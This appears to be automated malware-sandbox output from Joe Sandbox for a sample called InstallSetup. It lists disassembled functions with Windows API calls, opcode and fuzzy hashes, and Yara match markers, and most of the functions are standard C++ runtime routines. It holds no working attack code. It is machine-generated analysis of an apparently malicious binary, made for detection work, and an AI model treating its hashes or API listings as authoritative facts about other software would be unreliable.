Function 00953773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0095378C

Part of subcall function 00952B16: ___crtGetTimeFormatEx.LIBCMT ref: 00952B2C
Part of subcall function 00952B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00952B4B

GetLastError.KERNEL32 ref: 009537A8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009537BE
__CxxThrowException@8.LIBVCRUNTIME ref: 009537CC

Part of subcall function 009528EC: SetThreadPriority.KERNEL32(?,?), ref: 009528F8

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 9da3a13accd1078667e33772b935c28e0eb458fce7af7d7cfe0e9fa4d37d07ee
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 81F0A7B2A002153AD720F7769C0BFBB369C9B42752F504926BD15E7082FD98D40883B4

Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB

Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D

Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525

Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4

GetLastError.KERNEL32 ref: 00413541
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
__CxxThrowException@8.LIBVCRUNTIME ref: 00413565

Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC

Function 0095D074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0095D088
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0095D0AC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0095D0BF
__CxxThrowException@8.LIBVCRUNTIME ref: 0095D0CD

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 3c3c759a67ac8fa7bb9ee392105576dfd6c5cd6f26728ae50e6493a617844032
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 54F05935501204A3C734FB32D842E6EB37D8ED0716B60852AEC05172C2DF71A90EC751

Function 00952858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0095286F
GetLastError.KERNEL32(?,?,?,?,00958830,?,?,?,?,00000000,?,00000000), ref: 0095287E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00952894
__CxxThrowException@8.LIBVCRUNTIME ref: 009528A2

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: df9d5a06fc5eb0ac1777b48a62a1b5ca353223826e96d88fca8fb879b67e8570
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 3BF0A03450010ABBCF10EFE5CD46FAF37BC6B01702F600610BA10E20A1DB35DA089764

Function 00945A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 00945A83
__Cnd_signal.LIBCPMT ref: 00945A8F
std::_Cnd_initX.LIBCPMT ref: 00945AA4
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00945AAB

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 1dfeaabc9b2444ac47e2e18b1539d39ba9d6b224b98d2c198aad1881819b1f68
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 2CF05531000701AFEB20BB70DC07F1A73A0AF81328F14892DF045568A2DF7AEC548655

Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041263B

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768

Function 0095257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 00952593
GetLastError.KERNEL32(?,?,?,?,?,00950DA0), ref: 009525A1
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009525B7
__CxxThrowException@8.LIBVCRUNTIME ref: 009525C5

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 0c9b304f4b9687079fda4bb9ddbd6c92872159fda7533f5d3c86f9e8cf1943a3
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 5EE0D86160021529E710F7754C07F7F369C5B01B42F840951BD14E10C3FE94D50842A4

Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041232C
GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
__CxxThrowException@8.LIBVCRUNTIME ref: 0041235E

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC

Function 00959530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00952959: TlsAlloc.KERNEL32(?,00950DA0), ref: 0095295F

TlsAlloc.KERNEL32(?,00950DA0), ref: 00963BE6
GetLastError.KERNEL32 ref: 00963BF8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00963C0E
__CxxThrowException@8.LIBVCRUNTIME ref: 00963C1C

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: a0c32ddd00d793c4cac87abaa57484166e7eaaf0201afef933ac8f41ea1ac739
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: 91E0D874500206AFC310FB769C9BB7E76686A41742B504E26F925D31E2EE39D20D4B6C

Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8

TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
GetLastError.KERNEL32 ref: 00423991
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
__CxxThrowException@8.LIBVCRUNTIME ref: 004239B5

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D

Function 00952794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00950DA0), ref: 0095279E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00950DA0), ref: 009527AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009527C3
__CxxThrowException@8.LIBVCRUNTIME ref: 009527D1

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 42613e011fe0ae11cac6dd6b2eb1944bc4357fec2b4ae56097dbc74f28884f1f
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: 3DE0867460010AA7CB10FBB6DD4AFAF73BC6A41B02B600565B911E3151EB68EB0C8779

Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041256A

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

Function 009528EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 009528F8
GetLastError.KERNEL32 ref: 00952904
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0095291A
__CxxThrowException@8.LIBVCRUNTIME ref: 00952928

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: f1f308d22af4904c29f7d13b526aa7c12d18599ad9910820a997a3e9a078026d
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 8EE0863450010967CB14FF72CD0ABBF376C6B01742F500925BC15D20A1EF35D5088798

Function 009529B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00957BD8,00000000,?,?,00950DA0,?,?,?,00000000,?,00000000), ref: 009529BE
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 009529CA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009529E0
__CxxThrowException@8.LIBVCRUNTIME ref: 009529EE

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: faf36c6e578d5a73cbcef5e6eca5f6e379e710116df6fa65f85be8dac6ffbb71
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 02E086351001096BDB10FF71CD0ABBF376C6F01742F500925BD19E20A1EF35D51897A8

Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412691
GetLastError.KERNEL32 ref: 0041269D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126C1

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C

Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
__CxxThrowException@8.LIBVCRUNTIME ref: 00412787

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C

Function 00952959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00950DA0), ref: 0095295F
GetLastError.KERNEL32 ref: 0095296C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00952982
__CxxThrowException@8.LIBVCRUNTIME ref: 00952990

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 3f66f9ea9ae83a8d17a5f2ee9669f6a8c545a4c53a46936d5ee10e68e24a5ed3
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 7FE0C230000105678714FBB99C4EB7F32AC6A02752FA40B25F861E20E1EA68D40C43A8

Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
GetLastError.KERNEL32 ref: 00412705
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412729

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C

Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F10D

Strings

pow, xrefs: 0042F0E5, 0042F102

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F

Function 0097B0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0097B32B,?,00000050,?,?,?,?,?), ref: 0097B1AB

Strings

OCP, xrefs: 0097B124
ACP, xrefs: 0097B0EE

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: abe42c7bb98321e04d39beffb515d5e5b36c7d3dc5be50f2cceb26a5793da33c
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: 92213D63B18105AAEB249E648D22BA763AEEF94B61F97C524E90DD7204F732DD40C394

Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44

Strings

ACP, xrefs: 0043AE87
OCP, xrefs: 0043AEBD

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E

Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A

Strings

image/png, xrefs: 00401F58

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58

Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

